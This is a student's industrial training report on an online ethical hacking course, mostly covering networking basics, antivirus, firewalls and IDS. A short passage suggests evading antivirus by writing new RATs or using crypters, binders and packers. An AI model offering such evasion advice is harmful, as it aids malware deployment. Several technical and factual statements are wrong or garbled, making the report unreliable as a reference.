1. 1
Lucknow Institute of Technology, Lucknow
INDUSTRIAL TRAINING REPORT ON
Ethical hacking
SUBMITTED IN PARTIAL FULFILLMENT FOR THE AWARD OF THE OF
DEGREE OF BACHLOR OF TECHNOLOGY
IN
COMPUTER SCIENCE & ENGINEERING
SUBMITTED BY
Nitesh Kumar Dubey
B.Tech VII Semester
1836210903
Training taken under
ONLINE TRAINING INSTITUTE
2020-21
2. 2
ACKNOWLEDGMENT
The internship opportunity I had with ALISON Online training institute was a great chance
for learning and professional development. Therefore, I consider myself as a very lucky
individual as I was provided with an opportunity to be a part of it. I am also grateful for having
a chance to meet so many wonderful professionals who led me though this internship period.
Bearing in mind previous I am using this opportunity to express my deepest gratitude and
special thanks to the MD of Alison online trainings who in spite of being extraordinarily busy
with her/his duties, took time out to hear, guide and keep me on the correct path and allowing
me to carry out my project at their esteemed organization and extending during the training.
I express my deepest thanks to Prof. Indranil Sengupta, Ethical hacking and security
department for taking part in useful decision & giving necessary advices and guidance and
arranged all facilities to make life easier. I choose this moment to acknowledge his
contribution gratefully.
It is my radiant sentiment to place on record my best regards, deepest sense of gratitude to
Mr. Mike Feerick, founder and CEO of Alison, Mr. Nidranil Sengupta, Industrial Training
and project guide, for their careful and precious guidance which were extremely valuable for
my study both theoretically and practically.
I perceive as this opportunity as a big milestone in my career development. I will strive to use
gained skills and knowledge in the best possible way, and I will continue to work on their
improvement, in order to attain desired career objectives. Hope to continue cooperation with
all of you in the future,
Sincerely,
Nitesh Kumar Dubey
Place: Lucknow
Date:
3. 3
DECLARATION
I Nitesh Kumar Dubey hereby declare that the training report work entitled
“ETHICAL HACKING” submitted to LUCKNOW INSTITUTE OF TECHNOLOGY
LUCKNOW is partial fulfillment of the requirement for the award of the
Bachelor of Technology in Computer science and engineering under the
guidance of Alison Online Training Institute. I further declare that the
work reported in this Project has not been submitted and will not be
submitted for the award of any other degree or Diploma in this institute.
Place: Lucknow Signature of Student
Date: Nitesh Kumar Dubey
1836210903
4. 4
CERTIFICATE
Certified that this Industrial Training Report titled “ETHICAL HACKING” is
the Bonafied work of Mr. Nitesh Kumar Dubey who carried out the training
work under my supervision. Certified further, that to the best of my knowledge
the work reported here in does not form part of any other project report or
dissertation on the basis of which a degree or award was conferred on an earlier
occasion on this or any other candidate.
Mrs. Arifa Khan Prof. Indra Nil Sengupta
Head of Department IIT Kharagpur
Computer Science and Engineering Internship Coordinator
5. 5
TABLE OF CONTENTS
Serial
No.
Description Contents Page No.
1 Title of Page 1
2 Acknowledge 2
3 Declaration 3
4 Certificate 4
5 Table of contents 5
6 Industrial Overview 6 - 7
7 History and development of company 8 - 9
8 Training Objective 10
9 Courses Outline 11 - 62
10 Conclusion 63
11 References 64
6. 6
INDUSTRIAL OVERVIEW
Alison is one of the world’s largest free learning platforms for education and skills training. It is
a for-profit social enterprise dedicated to making it possible for anyone, to study anything,
anywhere, at any time, for free online, at any subject level. Through our mission we are a catalyst
for positive social change, creating opportunity, prosperity, and equality for everyone.
Alison was founded in Galway, Ireland, in 2007 and has grown organically to become a major
force in free online education and skills training. Today, with more than 18 million learners in 195
countries, Alison is changing how the world learns and up-skills.
We are committed to equality and access to education and skills training irrespective of gender,
geography, economic status or any other barriers that can so often stunt potential. So we offer
a range of free courses that meet the many diverse needs of our learners. The UN declared in
Article 26 of the 1946 Declaration of Human Rights that “Education shall be free…”. This
statement will always inspire us.
Alison was founded by Alison CEO, Mike Feerick. Mike is a businessman, but one with a
difference. He believes in social impact, and that you can build a financially successful business
focused on meeting a huge global social need, making education and skills training more
accessible for everyone. He invites anyone who believes that too, to support the Alison mission.
Alison is free of charge to you. But it’s still a business – albeit a socially-focused one. We are a
social enterprise making our money through advertising, merchandise, and the sale of
Certificates and Diplomas, should a graduate choose to buy one.
Alison Learning Centers
For many around the world, online learning is inaccessible. Millions are still without internet
access, need assistance with computers, and advice on how to start and maintain their online
education. Alison Learning Centers [ALCs] are an initiative for directly confronting these
challenges.
At an ALC, those without direct access to online learning, or who need or can benefit from
technical or learning support, can find the facilities, community, and support they need. ALCs
enable learners to study on Alison online as part of a group, to avail of off-line tutor assistance,
7. 7
or to simply receive encouragement and advice on how to begin the exciting lifelong journey of
online education and skills training.
Focusing on certified learning with proctored assessments, the ALC program also aims, where
possible, to empower learners by introducing career opportunities to program participants. ALC
managers reach out to local employers to explore options for finding work placement and
employment opportunities for ALC graduates. Combined, these career opportunities, online
education access, support, and encouragement make real differences to participants’ personal
and professional confidence and employability. Through this program, Alison also actively
delivers against the UN’s Sustainable Development Goals.
What you will find at an Alison Learning Centre
A safe, secure & serviced location to study
Qualified learning facilitators
Proctored learning certification services
A community of learners
Support to put learning into practice
Hear directly from ALC Graduates about how learning at an ALC has empowered their lives
and the people and communities around them.
At Alison Learning Centers, you can register to do a Certificate or Diploma course or
a Learning Path using the ALC’s computers and internet connection.
You can avail of technical and learning support provided by qualified learning administrators,
and enjoy the social environment provided by the center.
You will receive a certificate/diploma on attainment of a score of 80% or more in your final
proctored assessment.
You will gain access to information and guidance on how to use what you have learnt to
improve your livelihood.
And if you complete the course in the specified time, the cost of the entire service is less than
what you would pay for a pdf download of a certificate/diploma if you were to purchase these
directly on the Alison platform
8. 8
HISTORY AND DEVLOPMENT OF ALISON
In 2005, while server and broadband costs were decreasing and webpages were becoming more
monetizable, Mike Feerick realized that free education could be provided online as a scalable
business. In 2006, Feerick developed the platform and designed it. On 21 April 2007, Alison was
launched with its first free customer and six courses. Among Alison's stated aims are to drive all
costs of accessing digitally-based education and skills training to zero and to bring disruptive
innovation to global education and skills training through a scalable business model which
enables registered users to be educated for free. In April 2017, the company decided to make a
technical overhaul of the platform. The company also launched its mobile application, which
drives 50% of the website's traffic worldwide.
On 5 July 2016, President Pranab Mukherjee of India announced the partnership between Alison
and the National Skill Development Corporation.
Product and services
Businessmodel
Alison income is generated from advertising and sales of certificates. According to The
Economist, the company seeks to drive education through advertising in the manner of television
and radio. Through the online pay per click advertising revenue model, Alison has founded a
business model it can provide learning materials at no cost to the learner. It aims to make
learning accessible to blue collar or "bottom of the pyramid" learners.
Courses
Alison currently offers more than a thousand courses at certificate, diploma, and learning path
levels across nine core subject categories. The certificate level courses require two to three
hours of study while the more rigorous diploma level courses require ten to fifteen hours of
study. There is no time limit for completing a course. One of Alison's courses is ABC IT, a fifteen
to twenty-hour training suite which is cited by The New York Times as "covering similar ground"
to the International Computer Driving License without the cost of certification. In 2020, Alison
published a course on the coronavirus and translated it into more than languages.
Accreditation
According to the Alison website,
9. 9
Alison is currently accredited by CPD UK Continuing professional development.
https://cpduk.co.uk/directory/profile/capernaum-ltd-alison-com
https://alison.com/about/accreditation
Reception
Alison was among the four winners of the 2010 UNESCO King Hamad bin Isa Al Khalifa Prize,
a Prize for innovation in ICT for Education.] In October 2013, Alison won an award at the World
Innovation Summit for Education held in Qatar. Since 2013 Alison courses have become
generally recognized by many employers, particularly in occupations and disciplines where no
external certification by professional bodies post-graduation exist. It is estimated that currently
over 1.5 million people around the world have an Alison course on their CV.
David Bornstein of The New York Times noted that 'practical skills training is usually
expensive. Initially some observers also predicted the ineffectiveness of the MOOC model in
delivering real educational impact, highlighting the lack of personal interaction with educators
and the high drop-out rate of users with no incentive to commit without any material investment
of their own.
10. 10
Training Objective
The objectives of industrial training are:
To provide students the opportunity to test their interest in a particular career
before permanent commitments are made.
To develop skills in the application of theory to practical work situations.
To develop skills and techniques directly applicable to their careers.
Internships will increase a student's sense of responsibilityand good work
habits.
To expose students to real work environment experience,gain knowledge in
writing report in technical works/projects.
Internship students will have higher levels of academic performance.
Internship programs will increase student earning potential upon graduation.
To build the strength, teamwork spirit and self-confidence instudent’s life.
To enhance the ability to improve student’s creativity skills and sharing ideas.
To build a good communication skill with group of workers and learn to learn
properbehavior of corporate life in industrial sector.
The student will be able instilled with good moral values such as responsibility,
commitmentand trustworthy during their training.
11. 11
COURSES OUTLINE
Ethical hacking and basic concept of Networking
IP Addressing and Routing
Routing Protocol
Scanning
Enumeration
System hacking
Trojan and backdoors
Sniffers
Denial of Service
Hacking web servers
Web application Vulnerabilities
Web-based Password Cracking techniques
SQL Injection
Hacking wireless Networks
Virus and worms
Physical Security
Linux Hacking
Evading IDS, Firewalls, and Honey-pots
Buffer Overflows
Cryptography
Penetration Testing
12. 12
Ethical hacking and basic concept of networking
Introduction of Ethical hacking
Hacking has been a part of computing for almost five decades and it is a very broad discipline,
which covers a wide range of topics. The first known event of hacking had taken place in 1960
at MIT and at the same time, the term "Hacker" was originated.
Hacking is the act of finding the possible entry points that exist in a computer system or a
computer network and finally entering into them. Hacking is usually done to gain unauthorized
access to a computer system or a computer network, either to harm the systems or to steal
sensitive information available on the computer.
Hacking is usually legal as long as it is being done to find weaknesses in a computer or network
system for testing purpose. This sort of hacking is what we call Ethical Hacking.
A computer expert who does the act of hacking is called a "Hacker". Hackers are those who
seek knowledge, to understand how systems operate, how they are designed, and then attempt
to play with these systems.
Types of hacking
Website Hacking − Hacking a website means taking unauthorized control over a web
server and its associated software such as databases and other interfaces.
Network Hacking − Hacking a network means gathering information about a network by
using tools like Telnet, NS lookup, Ping, Tracert, Netstat, etc. with the intent to harm the
network system and hamper its operation.
Email Hacking − It includes getting unauthorized access on an Email account and using
it without taking the consent of its owner.
Ethical Hacking − Ethical hacking involves finding weaknesses in a computer or network
system for testing purpose and finally getting them fixed.
Password Hacking − This is the process of recovering secret passwords from data that
has been stored in or transmitted by a computer system.
Computer Hacking − This is the process of stealing computer ID and password by
applying hacking methods and getting unauthorized access to a computer system.
Purpose of Hacking
There could be various positive and negative intentions behind performing hacking activities.
Here is a list of some probable reasons why people indulge in hacking activities −
Just for fun
Show-off
13. 13
Steal important information
Damaging the system
Hampering privacy
Money extortion
System security testing
To break policy compliance
Hackers
Hacker are the unauthorized person which can access computer data or information without
owner permission. A computer expert who does the act of hacking is called a "Hacker". Hackers
are those who seek knowledge, to understand how systems operate, how they are designed,
and then attempt to play with these systems.
The Role of security and penetration testers
Script kiddies or pockets monkeys
Youngs or inexperienced hackers
Copy code and techniques for knowledgeable hackers.
Experienced Penetration testers writer Programs or Script using.
. Perl, C, C++, Python, JavaScript, Visual Basic, SQL and many other.
Penetration testing Methodologies
Tiger Box
Collection of operating systems and hacking tools.
Usually on Laptops
Helps Penetration testers and security testers tester conducts vulnerability
assessments and attacks.
White Box model
Tester is told everything about the network topology and technology
Tester is authorized to interview IT personnel’s and company employees.
Makes tester’s job a little easier.
Black Box model
Tester is not given details about the network.
Burden is on the tester to find the details.
Gray Box model
Hybrid of the white and black box models
Company gives tester Partial information.
14. 14
What we can do Legally?
Laws involving technology changes as rapidly as technology itself.
Find what is legal for you locally
Laws changes from place to place.
Be aware of what is allowed and what is not allowed
Laws of the Land
# Tools on your computer might be illegal to possess.
# Contact Local Law enforcement agencies before installing hacking tools.
# Written words are open to interpretation.
# Governments are getting more serious about Punishment for cybercrimes.
What we cannot do Legally?
o Accessing a computer permission is illegal.
o Other illegal actions:
Installing worms or viruses.
Denial of Service attacks.
Denying users to network resources.
o Be careful your actions do not Prevent customers from doing their jobs.
Ethical Hacking in a Nutshell
What it takes to be a Security tester?
Knowledge of network and computer technology.
Ability to communicate with management and IT Personnel.
Understanding of the law
Ability to use necessary tools. (May be Purchase or made)
Basics concepts of networking
ComputerNetworks:
A communication system for connecting computer/hosts
why it is needed for:
Better connectivity
Better communication
Better sharing of resources
Bring people together
15. 15
Type of Networks:
Local area network (LAN) {faster, cheaper, 10Mbps, Ethernet}
Connects hosts within a relatively small graphical area.
Same room
Same building
Same campus
A local area network (LAN) is a group of computers and peripheral devices that share
a common communications line or wireless link to a server within a distinct
geographic area. A local area network may serve as few as two or three users in a
home-office or several hundred users in a corporation's central office.
Wide area Network (WAN) {slower, expensive}
Hosts may be widely dispersed
Across Campuses.
Across city/ country/continents
A wide area network (WAN) is a telecommunications network that extends over a
large geographic area for the primary purpose of computer networking. Wide area
networks are often established with leased telecommunication circuits.
Data communication over a network
Broadly two Approaches:
Circuit switching
Packet switching
Circuit Switching
A dedicated communication path is established between two stations
The path follows a fixed sequence of intermediate links.
A logical channel gets defined on each physical links.
Dedicated to the Connection.
16. 16
Fig: there are 4 dedicated Link
Three steps are required for communication
Connection establishment:
Required before data transmission
Data transfer:
Can Proceed at maximum Speed.
Connection termination:
Required after the data transmission is over.
For deallocation of network resources.
Packet switching {using modern world}
Modern form of long-distance data communication.
Network resources are not dedicated.
A link can be shared.
The basic technology has evolved over time.
Basic concept has remained the same
Data are transmitted in short packets (~𝑘 𝑏𝑦𝑡𝑒𝑠 )
A longer message is broken into smaller chunks.
The chunks are called packets.
Every Packet contains a header.
Packet switching is based on store and forward concept.
Each intermediate network node receiver a Whole packet.
Dedicates the route
Forwards the packet along the selected route.
Each intermediate node (router) maintains a routing table
17. 17
Two Alternative Approaches use for packets transmitted
Virtual Circuits
Datagram Approaches
Virtual circuits Approaches
Similar in concept to circuit Switching.
A Route is established before Packet transmission starts.
All packets follow the same path
The links comprising the path are not dedicated
Different from circuit Switching in this respect.
Working technique in virtual Circuit approach
Router is established a priori
Packet forwarded from one node to the next using store and forward scheme.
Only the virtual circuit number need to be carried by a packet.
Each intermediate node maintains a table
Creating during route establishment.
Used for Packet forwarding,
No dynamic routing decision is taken by the intermediate nodes.
18. 18
Congestion Control in Virtual Circuit:
Once the congestion is detected in virtual circuit network, closed-loop techniques is used.
There are different approaches in this technique:
No new connection –
No new connections are established when the congestion is detected. This approach is
used in telephone networks where no new calls are established when the exchange is
overloaded.
Participation of congested router invalid –
Another approach to control congestion is allow all new connections but route these new
connections in such a way that congested router is not part of this route.
Negotiation –
To negotiate different parameters between sender and receiver of the network, when the
connection is established. During the set-up time, host specifies the shape and volume
of the traffic, quality of service and other parameters.
Datagram Approaches
No route is established beforehand
Each packet is transmitted as an independent entity.
Does not maintain any history {No Path are maintained}
Every intermediate node has to take routing decisions dynamically.
Makes use of a Routing table.
Every packet must contain source and destination address.
19. 19
Layered Network Architecture
Open System interconnection (OSI) reference model
OSI stands for Open System Interconnection is a reference model that describes how
information from a software application in one computer moves through a physical
medium to the software application in another computer.
OSI consists of seven layers, and each layer performs a particular network function.
OSI model was developed by the International Organization for Standardization (ISO) in
1984, and it is now considered as an architectural model for the inter-computer
communications.
OSI model divides the whole task into seven smaller and manageable tasks. Each layer
is assigned a particular task.
Each layer is self-contained, so that task assigned to each layer can be performed
independently.
20. 20
Physical Layer:
Transmit raw bit stream over a Physical medium.
Data Layer:
Reliable transfer of frames over a point-to-point link (flow control, Error control)
Network layer:
Establishing maintaining and terminating connections.
Routers Packets through Point-to-point link
Transport layer:
End-to-End reliable data transfer, with Error recovery and flow control.
Session Layer:
Manage Sessions.
Presentation Layer:
Provides data independence.
Application Layer:
Interface Point for user applications.
21. 21
TCP/ IP Architecture
o The TCP/IP model was developed prior to the OSI model.
o The TCP/IP model is not exactly similar to the OSI model.
o The TCP/IP model consists of five layers: the application layer, transport layer, network
layer, data link layer and physical layer.
o The first four layers provide physical standards, network interface, internetworking, and
transport functions that correspond to the first four layers of the OSI model and these four
layers are represented in TCP/IP model by a single layer called the application layer.
o TCP/IP is a hierarchical protocol made up of interactive modules, and each of them provides
specific functionality.
Here, hierarchical means that each upper-layer protocol is supported by two or more lower-level
protocols.
Functions of TCP/IP layers:
Network Access Layer
o A network layer is the lowest layer of the TCP/IP model.
o A network layer is the combination of the Physical layer and Data Link layer defined in the
OSI reference model.
o It defines how the data should be sent physically through the network.
o This layer is mainly responsible for the transmission of the data between two devices on the
same network.
22. 22
o The functions carried out by this layer are encapsulating the IP datagram into frames
transmitted by the network and mapping of IP addresses into physical addresses.
o The protocols used by this layer are ethernet, token ring, FDDI, X.25, frame relay.
Internet Layer
o An internet layer is the second layer of the TCP/IP model.
o An internet layer is also known as the network layer.
o The main responsibility of the internet layer is to send the packets from any network, and they
arrive at the destination irrespective of the route they take.
Following are the protocols used in this layer are:
IP Protocol: IP protocol is used in this layer, and it is the most significant part of the entire
TCP/IP suite.
Following are the responsibilities of this protocol:
o IP Addressing: This protocol implements logical host addresses known as IP addresses. The
IP addresses are used by the internet and higher layers to identify the device and to provide
internetwork routing.
o Host-to-host communication: It determines the path through which the data is to be
transmitted.
o Data Encapsulation and Formatting: An IP protocol accepts the data from the transport
layer protocol. An IP protocol ensures that the data is sent and received securely, it
encapsulates the data into message known as IP datagram.
o Fragmentation and Reassembly: The limit imposed on the size of the IP datagram by data
link layer protocol is known as Maximum Transmission unit (MTU). If the size of IP datagram
is greater than the MTU unit, then the IP protocol splits the datagram into smaller units so that
they can travel over the local network. Fragmentation can be done by the sender or
intermediate router. At the receiver side, all the fragments are reassembled to form an original
message.
o Routing: When IP datagram is sent over the same local network such as LAN, MAN, WAN,
it is known as direct delivery. When source and destination are on the distant network, then
the IP datagram is sent indirectly. This can be accomplished by routing the IP datagram
through various devices such as routers.
ARP Protocol
23. 23
o ARP stands for Address Resolution Protocol.
o ARP is a network layer protocol which is used to find the physical address from the IP address.
o The two terms are mainly associated with the ARP Protocol:
o ARP request: When a sender wants to know the physical address of the device, it broadcasts
the ARP request to the network.
o ARP reply: Every device attached to the network will accept the ARP request and process
the request, but only recipient recognize the IP address and sends back its physical address
in the form of ARP reply. The recipient adds the physical address both to its cache memory
and to the datagram header
ICMP Protocol
o ICMP stands for Internet Control Message Protocol.
o It is a mechanism used by the hosts or routers to send notifications regarding datagram
problems back to the sender.
o A datagram travels from router-to-router until it reaches its destination. If a router is unable to
route the data because of some unusual conditions such as disabled links, a device is on fire
or network congestion, then the ICMP protocol is used to inform the sender that the datagram
is undeliverable.
o An ICMP protocol mainly uses two terms:
o ICMP Test: ICMP Test is used to test whether the destination is reachable or not.
o ICMP Reply: ICMP Reply is used to check whether the destination device is responding or
not.
o The core responsibility of the ICMP protocol is to report the problems, not correct them. The
responsibility of the correction lies with the sender.
o ICMP can send the messages only to the source, but not to the intermediate routers because
the IP datagram carries the addresses of the source and destination but not of the router that
it is passed to.
Transport Layer
The transport layer is responsible for the reliability, flow control, and correction of data which is
being sent over the network.
The two protocols used in the transport layer are User Datagram protocol and Transmission
control protocol.
o User Datagram Protocol (UDP)
24. 24
o It provides connectionless service and end-to-end delivery of transmission.
o It is an unreliable protocol as it discovers the errors but not specify the error.
o User Datagram Protocol discovers the error, and ICMP protocol reports the error to the sender
that user datagram has been damaged.
o UDP consists of the following fields:
Source port address: The source port address is the address of the application program that
has created the message.
Destination port address: The destination port address is the address of the application
program that receives the message.
Total length: It defines the total number of bytes of the user datagram in bytes.
Checksum: The checksum is a 16-bit field used in error detection.
o UDP does not specify which packet is lost. UDP contains only checksum; it does not contain
any ID of a data segment.
o Transmission Control Protocol (TCP)
o It provides a full transport layer services to applications.
o It creates a virtual circuit between the sender and receiver, and it is active for the duration of
the transmission.
o TCP is a reliable protocol as it detects the error and retransmits the damaged frames.
Therefore, it ensures all the segments must be received and acknowledged before the
transmission is considered to be completed and a virtual circuit is discarded.
o At the sending end, TCP divides the whole message into smaller units known as segment,
and each segment contains a sequence number which is required for reordering the frames
to form an original message.
25. 25
o At the receiving end, TCP collects all the segments and reorders them based on sequence
numbers.
Application Layer
o An application layer is the topmost layer in the TCP/IP model.
o It is responsible for handling high-level protocols, issues of representation.
o This layer allows the user to interact with the application.
o When one application layer protocol wants to communicate with another application layer, it
forwards its data to the transport layer.
o There is an ambiguity occurs in the application layer. Every application cannot be placed
inside the application layer except those who interact with the communication system. For
example: text editor cannot be considered in application layer while web browser
using HTTP protocol to interact with the network where HTTP protocol is an application layer
protocol.
Following are the main protocols used in the application layer:
o HTTP: HTTP stands for Hypertext transfer protocol. This protocol allows us to access the data
over the world wide web. It transfers the data in the form of plain text, audio, video. It is known
as a Hypertext transfer protocol as it has the efficiency to use in a hypertext environment
where there are rapid jumps from one document to another.
o SNMP: SNMP stands for Simple Network Management Protocol. It is a framework used for
managing the devices on the internet by using the TCP/IP protocol suite.
o SMTP: SMTP stands for Simple mail transfer protocol. The TCP/IP protocol that supports the
e-mail is known as a Simple mail transfer protocol. This protocol is used to send the data to
another e-mail address.
o DNS: DNS stands for Domain Name System. An IP address is used to identify the connection
of a host to the internet uniquely. But, people prefer to use the names instead of addresses.
Therefore, the system that maps the name to the address is known as Domain Name System.
o TELNET: It is an abbreviation for Terminal Network. It establishes the connection between
the local computer and remote computer in such a way that the local terminal appears to be
a terminal at the remote system.
o FTP: FTP stands for File Transfer Protocol. FTP is a standard internet protocol used for
transmitting the files from one computer to another computer.
26. 26
IP ADDRESSING
Basic concept:
Each host connected to the internet is identified by a unique IP Address.
An IP address is 32-bit quality
Expressed as a dotted- decimal notation w.x.y.z where as dots are used to
separate each of the four octants of the address.
Consists of two logical parts.
a. A network numbers
b. A host numbers
This partition defined the IP address classes.
Hierarchical Addressing
A Computer on the internet is addressing using a two tuple.
1. The Network number: assigned and managed by central authority.
2. The host number: Assigned and managed by local network administrator.
When routing a packet to the destination network, only the network number is looked at.
IP ADDRESS CLASSES
There are five defined IP Address Classes.
In TCP/IP, the transport layer consists of two different Protocols
Transmission Control Protocol (TCP)
User datagram Protocol (UDP)
27. 27
Transmission Control Protocol (TCP)
TCP stands for Transmission Control Protocol. It is a transport layer protocol that facilitates
the transmission of packets from source to destination. It is a connection-oriented protocol that
means it establishes the connection prior to the communication that occurs between the
computing devices in a network. This protocol is used with an IP protocol, so together, they are
referred to as a TCP/IP.
Need of Transport Control Protocol
In the layered architecture of a network model, the whole task is divided into smaller tasks. Each
task is assigned to a particular layer that processes the task. In the TCP/IP model, five layers
are application layer, transport layer, network layer, data link layer, and physical layer. The
transport layer has a critical role in providing end-to-end communication to the directly
application processes. It creates 65,000 ports so that the multiple applications can be accessed
at the same time. It takes the data from the upper layer, and it divides the data into smaller
packets and then transmits them to the network layer.
Working of TCP
In TCP, the connection is established by using three-way handshaking. The client sends the
segment with its sequence number. The server, in return, sends its segment with its own
sequence number as well as the acknowledgement sequence, which is one more than the client
sequence number. When the client receives the acknowledgment of its segment, then it sends
the acknowledgment to the server. In this way, the connection is established between the client
and the server.
28. 28
TCP Header format
o Source port: It defines the port of the application, which is sending the data. So, this field
contains the source port address, which is 16 bits.
o Destination port: It defines the port of the application on the receiving side. So, this field
contains the destination port address, which is 16 bits.
o Sequence number: This field contains the sequence number of data bytes in a particular
session.
o Acknowledgment number: When the ACK flag is set, then this contains the next sequence
number of the data byte and works as an acknowledgment for the previous data received.
For example, if the receiver receives the segment number 'x', then it responds 'x+1' as an
acknowledgment number.
o HLEN: It specifies the length of the header indicated by the 4-byte words in the header. The
size of the header lies between 20 and 60 bytes. Therefore, the value of this field would lie
between 5 and 15.
o Reserved: It is a 4-bit field reserved for future use, and by default, all are set to zero.
o Flags
There are six control bits or flags:
1. URG: It represents an urgent pointer. If it is set, then the data is processed urgently.
2. ACK: If the ACK is set to 0, then it means that the data packet does not contain an
acknowledgment.
3. PSH: If this field is set, then it requests the receiving device to push the data to the receiving
application without buffering it.
29. 29
4. RST: If it is set, then it requests to restart a connection.
5. SYN: It is used to establish a connection between the hosts.
6. FIN: It is used to release a connection, and no further data exchange will happen.
o Window size
It is a 16-bit field. It contains the size of data that the receiver can accept. This field is used
for the flow control between the sender and receiver and also determines the amount of
buffer allocated by the receiver for a segment. The value of this field is determined by the
receiver.
o Checksum
It is a 16-bit field. This field is optional in UDP, but in the case of TCP/IP, this field is
mandatory.
o Urgent pointer
It is a pointer that points to the urgent data byte if the URG flag is set to 1. It defines a value
that will be added to the sequence number to get the sequence number of the last urgent
byte.
o Options
It provides additional options. The optional field is represented in 32-bits. If this field contains
the data less than 32-bit, then padding is required to obtain the remaining bits.
User datagram Protocol
User Datagram Protocol (UDP) is a Transport Layer protocol. UDP is a part of
Internet Protocol suite, referred as UDP/IP suite. Unlike TCP, it is unreliable and
connectionless protocol. So, there is no need to establish connection prior to data
transfer.
Though Transmission Control Protocol (TCP) is the dominant transport layer protocol
used with most of Internet services; provides assured delivery, reliabili ty and much
more but all these services cost us with additional overhead and latency. Here, UDP
comes into picture. For the realtime services like computer gaming, voice or video
communication, live conferences; we need UDP. Since high performance is needed,
UDP permits packets to be dropped instead of processing delayed packets. There is
no error checking in UDP, so it also save bandwidth.
User Datagram Protocol (UDP) is more efficient in terms of both latency and
bandwidth.
UDP Header –
UDP header is 8-bytes fixed and simple header, while for TCP it may vary from 20
bytes to 60 bytes. First 8 Bytes contains all necessary header information and
remaining part consist of data. UDP port number fields are each 16 bits long,
therefore range for port numbers defined from 0 to 65535; port number 0 is reserved.
30. 30
Port numbers help to distinguish different user requests or process.
1. Source Port: Source Port is 2 Byte long field used to identify port number of
sources.
2. Destination Port: It is 2 Byte long field, used to identify the port of destined
packet.
3. Length: Length is the length of UDP including header and the data. It is 16-bits
field.
4. Checksum: Checksum is 2 Bytes long field. It is the 16-bit one’s complement of
the one’s complement sum of the UDP header, pseudo header of information from
the IP header and the data, padded with zero octets at the end (if necessary) to
make a multiple of two octets.
Technology aspect for IT security & ethical hacking
Story:
“In real war a solder must need to understandable all weapons and there timing effect as per
target to win the war in minimum time”
Same IT security and Ethical hacking we need to break Antivirus, Firewall, IDS, and IPS for
penetration testing or ethical hacking.
1. Antivirus
Effective antivirus software guards your computer from all forms of malware, including traditional
computer viruses, worms, Trojan horses and even sophisticated, blended attacks. Not only does
antivirus software detect and eliminate any viruses or malware that may have already infected
your hard drive, many solutions that offer a free virus scan actively prevent new infections before
they have a chance to affect your computer. Antivirus software will scan and analyze emails and
files for infection as they are downloaded.
Using the method of signature-based detection, antivirus software checks a file's contents
against a dictionary of known virus signatures - a pattern of code that uniquely identifies a virus.
If a virus signature is found, the antivirus software will remove the threat.
Antivirus software obviously detects potential threats in a few different ways. But what about the
latest and greatest viruses? Because people create new viruses every day, an antivirus program
31. 31
will constantly update its dictionary of virus signatures. Many antivirus software programs --
including those that offer free virus protection -- also employ heuristic analysis, which can identify
variants of known malware - viruses that have been mutated or refined by attackers to create
different strains.
How antivirus work?
Before understand how antivirus work, first we need to understand how program
work in computer OS.
Technology aspect for IT security & ethical hacking 2013
Each program is code of instructions for processing inputs/outputs. The final form of code in
zero/one (Binary Language).
Antivirus company build team and list of known RAT and virus builders and create executable
files and found the most common part of each executable that always same by program, so
antivirus company build signature database and used by antivirus engine to prevent known
VIRUS.
For Unknown antivirus used behavior pattern they check the behavior like date of modification-
file, installation location, visibility type, etc. and block them as per rating system like Norton
SONAR is great example.
How to bypass antivirus?
To bypass antivirus, we need to build new RAT or virus using own coding else we need to modify
exciting code using crypted, binders, packers, etc.
33. 33
2. Firewall
Firewall is second pyramiding of IT security unauthorized or unwanted communications
between computer networks or hosts.
A firewall is a set of related programs, located at a network gateway server that protects the
resources of a private network from users from other networks. (The term also implies the
security policy that is used with the programs.) An enterprise with an intranet that allows its
workers access to the wider Internet installs a firewall to prevent outsiders from accessing
its own private data resources and for controlling what outside resources its own users have
access to.
Basically, a firewall, working closely with a router program, examines each network packet
to determine whether to forward it toward its destination. A firewall also includes or works
with a proxy server that makes network requests on behalf of workstation users. A firewall is
often installed in a specially designated computer separate from the rest of the network so
that no incoming request can get directly at private network resources.
There are a number of firewall screening methods. A simple one is to screen requests to
make sure they come from acceptable (previously identified) domain name and Internet
Protocol addresses. For mobile users, firewalls allow remote access in to the private
network by the use of secure logon procedures and authentication certificates.
A number of companies make firewall products. Features include logging and reporting,
automatic alarms at given thresholds of attack, and a graphical user interface for controlling
the firewall.
Computer security borrows this term from firefighting, where it originated. In firefighting, a
firewall is a barrier established to prevent the spread of fire.
What does firewalldo?
A firewall filters both inbound and outbound traffic. It can also manage public access to private
networked resources such as host applications. It can be used used to log all attempts to enter
the private network and trigger alarms when hostile or unauthorized entry is attempted.
Firewall can filter packets based on their source
And destination addresses and port numbers. This is known as address filtering. Firewall can
also filter specific type of network traffic. This is also known as protocol filtering because the
decision to forward or reject traffic is dependent upon the protocol used, for example HTTP, ftp
or telnet. Firewalls can also filter traffic by packet attribute or state.
34. 34
3. IDS (Intrusion Detection System)
An intrusion detection system (IDS) monitors network traffic and monitors for suspicious activity
and alerts the system or network administrator. In some cases, the IDS may also respond to
anomalous or malicious traffic by taking action such as blocking the user or source IP address
from accessing the network.
IDS come in a variety of “flavors” and approach the goal of detecting suspicious traffic in different
ways. There is network based (NIDS) and host based (HIDS) intrusion detection systems. There
are IDS that detect based on looking for specific signatures of known threats- similar to the way
antivirus software typically detects and protects against malware- and there are IDS that detect
based on comparing traffic patterns against a baseline and looking for anomalies. There are IDS
that simply monitor and alert and there are IDS that perform an action or actions in response to
a detected threat. We’ll cover each of these briefly.
There are three main types of IDS:
1. NIDS (Network Intrusion Detection System)
Network Intrusion Detection Systems are placed at a strategic point or points within the network
to monitor traffic to and from all devices on the network. Ideally you would scan all inbound and
outbound traffic; however, doing so might create a bottleneck that would impair the overall speed
of the network.
2. HIDS (Host-based Intrusion Detection System)
Host Intrusion Detection Systems are run on individual hosts or devices on the network. A HIDS
monitors the inbound and outbound packets from the device only and will alert the user or
administrator of suspicious activity is detected
3. SIDS (Stack-based Intrusion Detection System)
A signature-based IDS will monitor packets on the network and compare them against a
database of signatures or attributes from known malicious threats. This is similar to the way most
antivirus software detects malware. The issue is that there will be a lag between a new threat
being discovered in the wild and the signature for detecting that threat being applied to your IDS.
During that lag time your IDS would be unable to detect the new threat.
4. Anomaly Based
An IDS which is anomaly based will monitor network traffic and compare it against an established
baseline. The baseline will identify what is “normal” for that network- what sort of bandwidth is
generally used, what protocols are used, what ports and devices generally connect to each
other- and alert the administrator or user when traffic is detected which is anomalous, or
significantly different, than the baseline.
5. IPS (Intrusion prevention system)
35. 35
Intrusion prevention is a preemptive approach to network security used to identify potential
